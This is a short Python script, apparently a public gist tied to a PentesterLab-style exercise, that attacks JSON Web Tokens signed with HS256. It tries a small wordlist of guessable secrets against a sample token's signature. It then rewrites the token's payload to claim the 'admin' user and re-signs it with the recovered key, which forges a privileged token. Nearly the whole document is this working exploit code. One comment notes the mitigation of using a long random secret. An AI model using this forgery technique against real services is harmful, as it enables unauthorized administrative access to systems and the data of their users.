
@1dayluo
Created November 24, 2022 14:56
import base64
import hmac
import hashlib
import json
# Sample HS256 token in compact form: header.payload.signature, each segment
# base64url-encoded without padding.
jwt = (
    'eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9'            # {"typ":"JWT","alg":"HS256"}
    '.eyJ1c2VyIjpudWxsfQ'                             # {"user":null}
    '.Tr0VvdP6rVBGBGuI_luxGCOaz6BbhC6IxRTlKOW8UjM'    # HMAC-SHA256 signature
)
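def change_payload(jwt):
    """Return the token's payload segment re-encoded with ``user`` set to ``'admin'``.

    JWT segments are base64url without padding (RFC 7515), so the payload is
    decoded and re-encoded with the URL-safe alphabet. The standard alphabet
    used before corrupts any payload whose encoding contains ``-`` or ``_``.

    Args:
        jwt: Compact-serialized token, ``header.payload.signature``.

    Returns:
        bytes: The modified payload as unpadded base64url. The signature is
        not touched here, so the result only verifies once it is re-signed
        with the correct key.
    """
    payload = jwt.split('.')[1]
    # The compact form drops '=' padding; put back exactly what the decoder needs.
    padded = payload + '=' * (-len(payload) % 4)
    claims = json.loads(base64.urlsafe_b64decode(padded).decode('utf-8'))
    claims['user'] = 'admin'
    encoded = base64.urlsafe_b64encode(json.dumps(claims).encode('utf-8'))
    # Padding is stripped from the encoded bytes; the earlier rstrip ran on the
    # JSON text, where it could never match anything.
    return encoded.rstrip(b'=')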
def brute_sig(key, object):
    """Compute the HS256 signature segment for a signing input.

    Args:
        key: HMAC secret as bytes.
        object: Signing input as bytes (``header.payload`` in compact form).

    Returns:
        str: HMAC-SHA256 of ``object`` under ``key``, base64url-encoded with
        the trailing ``=`` padding removed.
    """
    mac = hmac.new(key, msg=object, digestmod=hashlib.sha256)
    encoded = base64.urlsafe_b64encode(mac.digest())
    return encoded.decode('utf-8').rstrip('=')
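# Split the sample token and prepare the modified payload.
header = jwt.split('.')[0]
payload = change_payload(jwt)
origin_sign = jwt.split('.')[-1]
brute_keys = ['hacker','jwt','insecurity','pentesterlab','hacking']

# The signing input is fixed for the whole run, so build it once from the
# original token. The loop used to rebuild it from `jwt`, which the loop
# itself overwrites on a match.
target = ".".join(jwt.split('.')[:-1])

# A match means the HS256 secret is a guessable word. The mitigation on the
# issuing side is a long random secret, rotated after any exposure.
for try_key in brute_keys:
    key = try_key.encode('utf-8')
    if brute_sig(key, target.encode('utf-8')) == origin_sign:
        print('[*]Brute sucess,the key is {}'.format(try_key))
        new_target = "{}.{}".format(header.rstrip('='),payload.decode('utf-8').rstrip('='))
        jwt = new_target + '.' + brute_sig(key, new_target.encode('utf-8')).rstrip('=')
        print('[*]new jwt is: {}'.format(jwt))
        # Stop at the first match; later candidates would otherwise be
        # compared against the already re-signed token.
        break
else:
    # Runs only when no candidate reproduced the original signature.
    print('[*]No candidate key matched the signature')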